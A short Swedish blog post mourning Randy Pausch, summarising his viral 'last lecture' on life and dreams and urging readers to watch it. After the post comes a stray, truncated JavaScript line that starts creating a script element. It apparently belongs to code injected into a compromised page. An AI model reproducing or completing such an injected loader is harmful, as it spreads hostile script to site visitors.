Randy Pausch, professor vid Carnegie Mellon University i USA diagnosticerades med cancer i augusti 2007, och fick veta att han har max 6 månader kvar att leva. Han gav i september en ”sista föreläsning” om hur man ska leva sitt liv, hur man uppnår sina drömmar osv som lades upp på Youtube och blev ett jättefenomen under en tid. I fredags dog han, 47 år gammal.

En inspirerande man vars ord nog kan hjälpa många med bra inställningar till att göra livet positivt, han pratar (om än i andra ord) om saker som att ha en positiv livssyn, vikten av dedikering, att ge värde, och massa mer. Se även på honom, hur han rör sig, hur han håller publikens uppmärksamhet. Om detta inte är warm alpha så vet jag inte vad som är. Lyssna på vad han säger!

Se hans klipp! Det är en och en halv timme långt, men det är det värt!

RIP Randy Pausch

Tack till Stu som först för ett par månader sedan tipsade oss om denna fantastiska video.

var d=document;var s=d.createElement(‘script’);